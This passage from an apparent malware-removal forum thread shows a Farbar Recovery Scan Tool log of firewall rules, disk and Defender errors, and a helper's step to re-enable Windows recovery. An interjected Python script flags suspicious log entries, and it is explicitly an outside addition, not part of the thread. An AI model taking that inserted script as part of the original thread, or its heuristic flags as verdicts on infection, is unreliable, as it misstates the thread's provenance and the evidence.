FirewallRules: [UDP Query User{DD0732C4-EE26-4E6D-9566-D42C50E770DC}C:\program file (x86) frostwire 6 - torrent & music downloader\frostwire 6\frostwire.exe] => (Allow) C:\program file (x86) frostwire 6 - torrent & music downloader\frostwire 6\frostwire.exe
FirewallRules: [{92D3E127-A9C9-4A57-A4DE-C37C30EEC069}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\Video Download Capture.exe
FirewallRules: [{6D97C59F-C2D5-4B5F-A2EB-62DED9A63774}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\Video Download Capture.exe
FirewallRules: [{595BE6ED-4AE7-4E50-8492-81EF52DC503B}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftSrv.dll
FirewallRules: [{51406614-36DB-4932-854C-7354C320CCCE}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftSrv.dll
FirewallRules: [{0FD1A6F0-6892-4528-8D02-6DA308CE78B8}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftDump.dll
FirewallRules: [{F5C52100-551E-41EB-9F6B-22785A10B72E}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftDump.dll
FirewallRules: [{F90CFC89-D1E5-47FE-810D-4C2A003E3EC4}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftAC.dll
FirewallRules: [{B4D1EF72-3517-40C5-A216-D67E59703BD4}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftAC.dll
FirewallRules: [{95D8704A-2EE2-4ABF-A286-E107F9FE797F}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftPlayer.dll
FirewallRules: [{4819C0F7-D28C-465D-9F1B-E02D925E86AE}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftPlayer.dll
FirewallRules: [{FC9BC8BE-3785-41F0-9673-77798F53F411}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftDownloaderHelp.dll
FirewallRules: [{97D423F4-0FDF-4C9C-9062-3118615A659E}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftDownloaderHelp.dll
FirewallRules: [{F3617F33-975E-49A1-82F7-525FC3550128}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftHDSDump.dll
FirewallRules: [{A279D673-8345-423B-A713-D33AE6388178}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftHDSDump.dll
FirewallRules: [{2AC43D62-7AC9-47C0-9BAF-E92B1B7BBA30}] => (Allow) C:\Users\Dan\AppData\Local\Temp\Andy_45.5_x64\Setup.exe
FirewallRules: [{C12F076D-5E2B-450E-91A2-3D08D18E1937}] => (Allow) C:\Users\Dan\AppData\Local\Temp\Andy_45.5_x64\Setup.exe
FirewallRules: [{3D3CF842-8298-442A-B9C9-A5399B012E71}] => (Allow) C:\Program Files\Andy\andy.exe
FirewallRules: [{C31226E6-F861-4DEA-B2FD-2634BE6F0129}] => (Allow) C:\Program Files\Andy\andy.exe
FirewallRules: [{D12533D4-1609-4FAF-85BD-3A23601A19D7}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{C02EE326-2CB8-4B8B-85EE-B9EF5101D2FC}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{E6F43DE1-5773-4F5C-997C-8F9A152B8CC6}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{4A1A6E79-2801-44AC-93C6-A5698676BF58}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{447CC466-EC34-4DCC-9474-38A417083D49}] => (Allow) C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe
FirewallRules: [{B6E8D305-52B5-45E2-8C5A-2EE37A8ADB44}] => (Allow) C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe
FirewallRules: [{0649CB28-67B5-48B4-B97E-CDA231670A45}] => (Allow) C:\Program Files\Andy\HandyAndy.exe
FirewallRules: [{5BAD7087-DE25-4030-A16A-578CD107BD81}] => (Allow) C:\Program Files\Andy\HandyAndy.exe
FirewallRules: [{BF1E40F5-A2D7-4946-895B-E0067521547F}] => (Allow) C:\Program File (x86) WINAMP Radio & Music Player Browser - NEW Ver\Winamp\winamp.exe
FirewallRules: [{17ED7A00-1D80-4074-B1AB-25880A7BB6B6}] => (Allow) C:\Program File (x86) WINAMP Radio & Music Player Browser - NEW Ver\Winamp\winamp.exe
FirewallRules: [TCP Query User{396BBCA8-02CB-4338-8B42-915ECADCD922}C:\program file (x86) presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) C:\program file (x86) presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe
FirewallRules: [UDP Query User{73E87333-E910-4EEC-804C-17612FDD0764}C:\program file (x86) presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) C:\program file (x86) presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe
FirewallRules: [{9E3E9781-622A-4CDF-A7EF-F851961BEA19}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\WebKit2WebProcess.exe
FirewallRules: [{7C52A72D-17FC-484E-A819-81F527082F0F}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\Resolve.exe
FirewallRules: [{5B94E67F-A6E7-4C37-B249-3CED37E49F0D}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\bmdpaneld.exe
FirewallRules: [{BA3F2295-A446-4372-A933-C67E6917CAA9}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\JLCooperPanelDaemon.exe
FirewallRules: [{AF2811BE-4318-4F7F-8F60-8E10AD92B8F2}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\EuphonixPanelDaemon.exe
FirewallRules: [{9D04EBDE-0FDE-4918-94E4-D40C3C002C6F}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\TangentPanelDaemon.exe
FirewallRules: [{BDA720FB-BED0-4342-84C3-1AF5017ECCAA}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\ElementsPanelDaemon.exe
FirewallRules: [{56DE631C-A030-4DF6-B707-2D24656517FF}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\DPDecoder.exe
FirewallRules: [{B0D56FFA-C1C5-488E-B442-2038AC05A5A6}] => (Allow) C:\ProgramData\Blackmagic Design\DaVinci Resolve\Support\QtDecoder\QTDecoder.exe
FirewallRules: [TCP Query User{80D1B33D-1849-4BEE-B7BB-78C9D2D3F544}C:\program file (x86) davinci 12.5 beta video edting software\dpdecoder.exe] => (Block) C:\program file (x86) davinci 12.5 beta video edting software\dpdecoder.exe
FirewallRules: [UDP Query User{B40DADB6-9E25-4951-B741-8458BE0396EE}C:\program file (x86) davinci 12.5 beta video edting software\dpdecoder.exe] => (Block) C:\program file (x86) davinci 12.5 beta video edting software\dpdecoder.exe
FirewallRules: [{9B19D861-CA78-446B-AD40-2E9AA11FDFB5}] => (Allow) C:\Program File (x86) VSDC Video Editor - Free\FlashIntegro\VideoEditor\VideoEditor.exe
FirewallRules: [{9A1FF358-15BA-4495-8972-7D4A585582FE}] => (Allow) C:\Program File (x86) VSDC Video Editor - Free\FlashIntegro\VideoEditor\VideoEditor.exe
FirewallRules: [{DFD16930-C6D4-42A7-8594-A07EAE59D209}] => (Allow) C:\Program File (x86) VSDC Video Editor - Free\FlashIntegro\VideoEditor\Updater.exe
FirewallRules: [{96FED481-82D0-450B-85C3-36735EB1549F}] => (Allow) C:\Program File (x86) VSDC Video Editor - Free\FlashIntegro\VideoEditor\Updater.exe
FirewallRules: [{17F50D30-FD50-46D0-BEE3-81847CF40C64}] => (Allow) 㩃停潲牧浡䘠汩獥⠠㡸⤶睜湩晤湩層楷摮楦摮攮數
FirewallRules: [{96606CA1-E101-4434-AE0C-6C99B774D1CA}] => (Allow) 㩃停潲牧浡䘠汩獥⠠㡸⤶睜湩晤湩層楷摮楦摮⹟硥e
FirewallRules: [{D61EF620-8F0B-40A6-9BB7-E836DA310B7C}] => (Block) %SystemDrive%\Program File (x86) Adobe Premiere Pro CC - 2 - (Program)\Adobe Premiere Pro CC 2015\Adobe Premiere Pro.exe
FirewallRules: [{91606396-6288-43E6-AE6F-EEB421C75181}] => (Block) %SystemDrive%\Program File (x86) Adobe Premiere Pro CC - 2 - (Program)\Adobe Premiere Pro CC 2015\Adobe Premiere Pro.exe
FirewallRules: [{807550B5-7265-4327-9B16-266D34A7742C}] => (Block) %SystemDrive%\Program File (x86) Adobe After Effects CS6 - Video EfXs Program 2\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe
FirewallRules: [{EE7BB404-A2CF-4E23-A355-EA7C2D953145}] => (Block) %SystemDrive%\Program File (x86) Adobe After Effects CS6 - Video EfXs Program 2\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe
FirewallRules: [{7C716CAC-0CA5-496D-B6B1-DBB04F82E573}] => (Block) %ProgramFiles%\Adobe\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe
FirewallRules: [{047E31DF-A255-4F4C-9FE9-45DD54A3AB3B}] => (Block) %ProgramFiles%\Adobe\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe
FirewallRules: [{B06B32BA-F38C-4C17-B422-99E7605B0063}] => (Block) %ProgramFiles%\Adobe\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe
FirewallRules: [{E511541B-CD44-4376-A542-B6A6578FA8EE}] => (Block) %ProgramFiles%\Adobe\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe
FirewallRules: [{068BAA54-B58F-43B6-8ADB-31E4DEE03ACC}] => (Block) %ProgramFiles%\Adobe\Adobe Media Encoder CC 2015.3\Adobe Media Encoder.exe
FirewallRules: [{B44756B4-DFCA-4CC9-953C-CCE8AE6CC11A}] => (Block) %ProgramFiles%\Adobe\Adobe Media Encoder CC 2015.3\Adobe Media Encoder.exe
FirewallRules: [{3C331E6B-E428-4D0C-BEA4-0FA06032B9D0}] => (Block) %ProgramFiles% (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
FirewallRules: [{D450C4CE-50CA-4D6B-A47C-AF19379507B1}] => (Block) %ProgramFiles% (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
FirewallRules: [{640DFB21-833E-420D-B80D-AC0DD899B614}] => (Allow) C:\Program Files (x86)\SrpnFiles\SrpnFiles.exe
FirewallRules: [{6CAA584E-EA21-4F97-9554-1E5312569977}] => (Allow) C:\Program Files (x86)\SrpnFiles\SrpnFiles.exe
FirewallRules: [{099E93F9-CFBA-4E6D-A852-0EFDF6E69C77}] => (Allow) C:\Program Files (x86)\SrpnFiles\downloader.exe
FirewallRules: [{10B74A86-9FC5-4D84-955B-4B2C2FAADC83}] => (Allow) C:\Program Files (x86)\SrpnFiles\downloader.exe
FirewallRules: [{65FA2FF6-971C-44E8-8D5E-C565539E0181}] => (Block) %SystemDrive%\Program File (x86) CrazyTalk Animator 2 Pipeline 8.03.1620.1 + Crack [SadeemPC]\CrazyTalk Animator 2\CrazyTalk Animator 2\CrazyTalkAnimator.exe
FirewallRules: [{88078A39-6DBF-4310-9720-BC7A9811094B}] => (Block) %SystemDrive%\Program File (x86) CrazyTalk Animator 2 Pipeline 8.03.1620.1 + Crack [SadeemPC]\CrazyTalk Animator 2\CrazyTalk Animator 2\CrazyTalkAnimator.exe
FirewallRules: [{5D12474E-76BE-4D8A-8BD7-4CECA0F32CFB}] => (Allow) C:\Users\Dan\AppData\Local\Kometa\Application\kometa.exe
FirewallRules: [{814CAEF2-ADD6-4507-BAE2-55F6820A7994}] => (Allow) 㩃停潲牧浡䘠汩獥⠠㡸⤶䝜湥牥捩桳楡汬屩敇敮楲獣慨汩楬攮數
FirewallRules: [{0E3753F1-E381-437A-BC70-0B47ECA113FA}] => (Allow) 㩃停潲牧浡䘠汩獥⠠㡸⤶䝜湥牥捩桳楡汬屩敇敮楲獣慨汩楬⹟硥e
FirewallRules: [{8269955E-0B8F-464C-B326-2023E770CABC}] => (Allow) C:\Program Files (x86)\Henwood\fontenot.exe
FirewallRules: [{3606180A-FA39-4B14-88F6-E879C8BB4B0B}] => (Allow) C:\Program Files (x86)\Police\fontenot.exe
FirewallRules: [{99FAD6CC-61D4-4806-B204-7F3641DDD7F3}] => (Block) %ProgramFiles% (x86)\FaceGen\Artist Pro\fgArtistPro.exe
FirewallRules: [{6CCE0F5A-ED5B-48E9-898C-B3168715BED1}] => (Block) %ProgramFiles% (x86)\FaceGen\Artist Pro\fgArtistPro.exe
FirewallRules: [TCP Query User{9536F0CC-5E66-46E8-805B-67D9697C530F}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{C5258519-221C-4A37-A687-51526258F672}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [{5507329C-601E-4572-9AD8-6C16774E1ADC}] => (Allow) C:\Program File (x86) Firefox Web Browser Mozilla\firefox.exe
FirewallRules: [{187A8271-92D7-449D-8643-56ECD2671F9C}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{C260D9CD-8DD2-4B5A-8BDE-C4CFD01C9F25}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{DB1E8DAE-0016-43D8-BB69-DC8005FC9089}C:\program files (x86)\mozilla firefox\firefox.exe] => (Block) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [UDP Query User{EA5A15E3-2AE2-47A4-AB76-6A52AAB47F97}C:\program files (x86)\mozilla firefox\firefox.exe] => (Block) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [{31F2912A-119F-44BD-A9EB-53A4D506D23B}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
==================== Restore Points =========================
 
ATTENTION: System Restore is disabled
 
==================== Faulty Device Manager Devices =============
 
Name: 
Description: 
Class Guid: 
Manufacturer: 
Service: 
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (06/04/2018 08:42:31 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )
Description: Failed to schedule Software Protection service for re-start at 2118-05-12T00:42:31Z. Error Code: 0x80070020.
 
Error: (06/04/2018 08:42:01 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )
Description: Failed to schedule Software Protection service for re-start at 2118-05-12T00:42:01Z. Error Code: 0x80070020.
 
Error: (06/04/2018 08:41:31 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )
Description: Failed to schedule Software Protection service for re-start at 2118-05-12T00:41:30Z. Error Code: 0x80070020.
 
Error: (06/04/2018 08:41:00 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )
Description: Failed to schedule Software Protection service for re-start at 2118-05-12T00:41:00Z. Error Code: 0x80070020.
 
Error: (06/04/2018 08:40:30 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )
Description: Failed to schedule Software Protection service for re-start at 2118-05-12T00:40:30Z. Error Code: 0x80070020.
 
Error: (06/04/2018 08:40:00 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )
Description: Failed to schedule Software Protection service for re-start at 2118-05-12T00:40:00Z. Error Code: 0x80070020.
 
Error: (06/04/2018 08:39:30 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )
Description: Failed to schedule Software Protection service for re-start at 2118-05-12T00:39:30Z. Error Code: 0x80070020.
 
Error: (06/04/2018 08:39:00 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )
Description: Failed to schedule Software Protection service for re-start at 2118-05-12T00:39:00Z. Error Code: 0x80070020.
 
 
System errors:
=============
Error: (06/04/2018 08:59:21 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.
 
Error: (06/04/2018 08:59:21 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.
 
Error: (06/04/2018 08:59:21 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.
 
Error: (06/04/2018 08:59:21 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.
 
Error: (06/04/2018 08:59:21 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.
 
Error: (06/04/2018 08:59:19 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.
 
Error: (06/04/2018 08:59:19 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.
 
Error: (06/04/2018 08:59:19 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.
 
 
Windows Defender:
===================================
Date: 2015-02-02 09:49:52.792
Description: 
Windows Defender scan has been stopped before completion.
Scan ID: {4BF9AF7B-A43D-4E64-B277-DEFB56CDC0E3}
Scan Type: Antimalware
Scan Parameters: Quick Scan
 
Date: 2015-02-02 08:06:18.260
Description: 
Windows Defender scan has been stopped before completion.
Scan ID: {16FD4F1F-550C-4A26-9400-0412629CFD5A}
Scan Type: Antimalware
Scan Parameters: Quick Scan
 
Date: 2015-02-01 10:17:58.118
Description: 
Windows Defender scan has been stopped before completion.
Scan ID: {BADC4EF7-6BAD-444C-AB05-92085B6CF93D}
Scan Type: Antimalware
Scan Parameters: Quick Scan
 
Date: 2015-02-01 08:23:26.263
Description: 
Windows Defender scan has been stopped before completion.
Scan ID: {C9B87AF6-96B3-4644-9422-EB0CED28391C}
Scan Type: Antimalware
Scan Parameters: Quick Scan
 
Date: 2015-01-31 08:30:36.872
Description: 
Windows Defender scan has been stopped before completion.
Scan ID: {4D8C80CB-F50C-47EE-94E8-DC02EC0EE056}
Scan Type: Antimalware
Scan Parameters: Quick Scan
 
Date: 2015-02-01 05:57:28.954
Description: 
Windows Defender has encountered an error trying to update signatures.
New Signature Version: 
Previous Signature Version: 110.6.0.0
Update Source: Microsoft Malware Protection Center
Signature Type: Network Inspection System
Update Type: Full
Current Engine Version: 
Previous Engine Version: 2.1.10302.0
Error code: 0x80072ee7
Error description: The server name or address could not be resolved 
 
Date: 2015-02-01 05:57:28.938
Description: 
Windows Defender has encountered an error trying to update signatures.
New Signature Version: 
Previous Signature Version: 1.167.387.0
Update Source: Microsoft Malware Protection Center
Signature Type: AntiSpyware
Update Type: Full
Current Engine Version: 
Previous Engine Version: 1.1.10302.0
Error code: 0x80072ee7
Error description: The server name or address could not be resolved 
 
Date: 2015-02-01 05:57:28.938
Description: 
Windows Defender has encountered an error trying to update signatures.
New Signature Version: 
Previous Signature Version: 1.167.387.0
Update Source: Microsoft Malware Protection Center
Signature Type: AntiVirus
Update Type: Full
Current Engine Version: 
Previous Engine Version: 1.1.10302.0
Error code: 0x80072ee7
Error description: The server name or address could not be resolved 
 
Date: 2015-02-01 05:57:28.844
Description: 
Windows Defender has encountered an error trying to update signatures.
New Signature Version: 
Previous Signature Version: 1.167.387.0
Update Source: Microsoft Update Server
Signature Type: AntiVirus
Update Type: Full
Current Engine Version: 
Previous Engine Version: 1.1.10302.0
Error code: 0x8024402c
Error description: An unexpected problem occurred while checking for updates. For information on installing or troubleshooting updates, see Help and Support. 
 
Date: 2015-01-30 05:22:07.607
Description: 
Windows Defender has encountered an error trying to update signatures.
New Signature Version: 
Previous Signature Version: 110.6.0.0
Update Source: Microsoft Malware Protection Center
Signature Type: Network Inspection System
Update Type: Full
Current Engine Version: 
Previous Engine Version: 2.1.10302.0
Error code: 0x80072ee7
Error description: The server name or address could not be resolved 
 
CodeIntegrity:
===================================
 
Date: 2018-06-04 20:47:54.128
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
Date: 2018-06-04 20:18:23.888
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
Date: 2018-06-03 20:21:00.442
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
Date: 2018-06-02 19:44:42.276
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
Date: 2018-06-01 20:24:19.030
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
Date: 2018-05-31 20:26:36.690
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
Date: 2018-05-30 20:23:16.216
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
Date: 2018-05-29 20:18:30.477
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
==================== Memory info =========================== 
 
Processor: Intel® Celeron® CPU N2830 @ 2.16GHz
Percentage of memory in use: 51%
Total physical RAM: 3982.68 MB
Available physical RAM: 1942.13 MB
Total Virtual: 4686.68 MB
Available Virtual: 2737.64 MB
 
==================== Drives ================================
 
Drive c: (OS) (Fixed) (Total:444.65 GB) (Free:147.57 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive d: () (Removable) (Total:7.45 GB) (Free:3.56 GB) FAT32
 
\\?\Volume{3e80ab0f-bf50-4f22-8c02-3c22ee1a6bb4}\ (Recovery) (Fixed) (Total:0.88 GB) (Free:0.59 GB) NTFS
\\?\Volume{436d9e19-7fb5-4350-864c-86573ec335b2}\ () (Fixed) (Total:0 GB) (Free:0 GB) 
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (Size: 465.8 GB) (Disk ID: 3F7852A4)
 
Partition: GPT.
 
========================================================
Disk: 1 (Protective MBR) (Size: 7.5 GB) (Disk ID: 00000000)
 
Partition: GPT.
 
==================== End of Addition.txt ============================
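As an added example (my own code, not FRST's and not something posted in this thread), here is a Python triage script over lines in the format FRST writes to Addition.txt and FRST.txt; the sample lines are copied from this thread's logs, and the flag names and the PROFILE_DIRS list are my own assumptions about what a responder reviews first.

```python
"""Triage helper for Farbar Recovery Scan Tool (FRST) text logs.

Added example for this thread, not part of FRST or of the helper's own tooling.
It flags the entries a responder reviews first: firewall rules whose program
path is non-ASCII mojibake, unsigned processes or allowed programs living in a
user profile or ProgramData directory, one executable name found under several
directories, and CodeIntegrity events saying an image hash could not be verified.
"""
import re
from collections import Counter, defaultdict

# "FirewallRules: [{GUID}] => (Allow) C:\path\app.exe"
FIREWALL_RE = re.compile(r"^FirewallRules: \[(?P<name>[^\]]*)\] => \((?P<action>Allow|Block)\) (?P<path>.+)$")
# "(Publisher) C:\path\app.exe" lines from the Processes / Services sections; "()" means no publisher
PROCESS_RE = re.compile(r"^\((?P<company>[^)]*)\) (?P<path>(?:[A-Za-z]:|%\w+%)\\.+)$")
CODE_INTEGRITY_RE = re.compile(r"unable to verify the image integrity of the file (?P<path>.+?) because")
# Directories (my own choice) from which an unsigned or firewall-allowed program deserves a look
PROFILE_DIRS = ("\\appdata\\local\\", "\\appdata\\roaming\\", "\\programdata\\", "\\users\\public\\")


def parse_firewall_rules(lines):
    """Yield (rule_name, action, path) for every FirewallRules line."""
    for line in lines:
        m = FIREWALL_RE.match(line.strip())
        if m:
            yield m.group("name"), m.group("action"), m.group("path")

def parse_processes(lines):
    """Yield (publisher, path) for every '(Publisher) <path>' line."""
    for line in lines:
        m = PROCESS_RE.match(line.strip())
        if m:
            yield m.group("company"), m.group("path")

def flags_for_path(path, company=None):
    """Return the review flags (labels are my own) that apply to one program path."""
    flags = []
    if any(ord(ch) > 127 for ch in path):
        flags.append("non-ascii-path")  # e.g. the CJK-looking rules in this thread's Addition.txt
    if any(d in path.lower() for d in PROFILE_DIRS):
        flags.append("profile-or-programdata-path")
    if company == "":
        flags.append("no-publisher")
    return flags

def duplicate_basenames(paths):
    """Executable names that appear under more than one directory (case-folded)."""
    parents = defaultdict(set)
    for p in paths:
        parent, _, base = p.lower().rpartition("\\")
        parents[base].add(parent)
    return {b: sorted(ps) for b, ps in parents.items() if len(ps) > 1}

def code_integrity_failures(lines):
    """Count 'unable to verify the image integrity' events per image path."""
    counts = Counter()
    for line in lines:
        m = CODE_INTEGRITY_RE.search(line)
        if m:
            counts[m.group("path")] += 1
    return counts

def triage(lines):
    """Run every check over the log lines and keep only the entries that got a flag."""
    firewall, paths, processes = [], [], []
    for name, action, path in parse_firewall_rules(lines):
        paths.append(path)
        flags = flags_for_path(path)
        if flags:
            firewall.append({"rule": name, "action": action, "path": path, "flags": flags})
    for company, path in parse_processes(lines):
        flags = flags_for_path(path, company)
        if flags:
            processes.append({"company": company, "path": path, "flags": flags})
    return {"firewall": firewall, "processes": processes,
            "duplicates": duplicate_basenames(paths),
            "code_integrity": code_integrity_failures(lines)}


# Constructed sample: a few lines copied from the logs posted in this thread.
SAMPLE_LOG = r"""
FirewallRules: [{31F2912A-119F-44BD-A9EB-53A4D506D23B}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{5D12474E-76BE-4D8A-8BD7-4CECA0F32CFB}] => (Allow) C:\Users\Dan\AppData\Local\Kometa\Application\kometa.exe
FirewallRules: [{17F50D30-FD50-46D0-BEE3-81847CF40C64}] => (Allow) 㩃停潲牧浡䘠汩獥⠠㡸⤶睜湩晤湩層楷摮楦摮攮數
FirewallRules: [{8269955E-0B8F-464C-B326-2023E770CABC}] => (Allow) C:\Program Files (x86)\Henwood\fontenot.exe
FirewallRules: [{3606180A-FA39-4B14-88F6-E879C8BB4B0B}] => (Allow) C:\Program Files (x86)\Police\fontenot.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
() C:\ProgramData\dahhService\dahhService.exe
() C:\Users\Dan\AppData\Local\aucozre\aucozre.exe
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system.
""".strip().splitlines()

if __name__ == "__main__":
    for section, entries in triage(SAMPLE_LOG).items():
        print(section, entries)
```

Flagged entries are starting points for review, not verdicts; a user's own non-standard install folders will show up next to genuinely unwanted files.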


#19 RayS

  • Malware Response Team
  • 2,433 posts
  • Gender:Male
  • Location:USA

Posted 06 June 2018 - 04:30 PM

Hi Dan,
 
Your sick laptop is infected with a nasty trojan called SmartService. We need to enter the Recovery Environment (RE) to remove the infection, but RE is currently blocked on your laptop. Please perform the procedure below on your sick laptop. It will unblock RE. In my next post, we will enter RE and run a more extensive script.

 

  • Right click on Start and select Command Prompt (Admin)
  • Copy and paste the following line next to the prompt in the command window and press Enter

bcdedit /set recoveryenabled Yes

  • As the result of running this command, you should see The operation completed successfully.

 

In your next reply...

  • Please confirm you saw The operation completed successfully when you ran the command.

 

Thank you,

 

Ray




#20 danban
  • Topic Starter
  • Members
  • 119 posts
  • Gender:Male
  • Location:Bronx New York

Posted 07 June 2018 - 11:51 AM

Hi Ray,

I did the command prompt on my computer and the operation completed successfully.

 

Dan



#21 RayS

  • Malware Response Team
  • 2,433 posts
  • Gender:Male
  • Location:USA

Posted 10 June 2018 - 12:59 AM

Hi Dan,

Overview
FRST64.exe on your sick laptop is out of date and the Fixlist.txt on that machine has been corrupted. Download fresh copies of both of these files and work exclusively with these new versions, but DO NOT insert the thumb drive into your sick laptop yet. Launch Recovery Environment (RE) and open Command Prompt on your sick laptop. Only after Command Prompt is open, insert the thumb drive into the sick laptop. Navigate to FRST64.exe on your thumb drive and run the script. Send me Fixlog.txt. Scan again with FRST64.exe in normal boot and send me FRST.txt and Addition.txt.

 

Please read these instructions through to the end before you begin.


Prepare your thumb drive

  • Please download a fresh copy of Farbar Recovery Scan Tool (FRST64.exe) onto your clean PC from https://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/.
  • Download the attached copy of Fixlist.txt onto your clean PC (delete or overwrite any previous version of Fixlist.txt).
